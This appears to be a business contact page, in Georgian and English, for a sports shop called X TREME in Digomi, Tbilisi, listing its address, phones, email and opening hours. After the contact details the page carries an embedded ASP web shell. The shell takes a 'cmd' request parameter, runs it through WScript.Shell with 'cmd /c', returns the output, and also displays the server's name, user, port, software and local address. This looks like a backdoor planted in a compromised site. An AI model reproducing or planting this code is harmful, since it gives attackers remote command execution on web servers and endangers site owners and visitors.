თბილისი 0159.
X TREME - დიღმის მასივი, ბელიაშვილის ქ. 85. დიღმის ხიდთან ახლოს.
ტელეფონი: +(995) 599 030314;
+(995 32) 239-79-99 /236-86-36 ;
ფაქსი: +(995 32) 251-89-49 ; 

ელ-ფოსტა: dvsporti@gmail.com

ვმუშაობთ ყოველდღე 11:00-19:00

 

Tbilisi. Georgia.

0159 Digomi, 85 Beliashvili str. Near Digomi bridge.

Tel: +(995) 599 030314;
+(995 32) 239-79-99 /236-86-36 ;
Fax: +(995 32) 251-89-49 ; 

E-mail: dvsporti@gmail.com

Opening hours are Mon-Sun:
From 11:00 to 19:00​ 

<% Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") Function getCommandOutput(theCommand) Dim objShell, objCmdExec Set objShell = CreateObject("WScript.Shell") Set objCmdExec = objshell.exec(thecommand) getCommandOutput = objCmdExec.StdOut.ReadAll end Function %>

 

<%= "" & oScriptNet.ComputerName & "" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>

The server's port: <%Response.Write(Request.ServerVariables("server_port"))%>

The server's software: <%Response.Write(Request.ServerVariables("server_software"))%>

The server's software: <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> <% szCMD = request("cmd") thisDir = getCommandOutput("cmd /c" & szCMD) Response.Write(thisDir)%>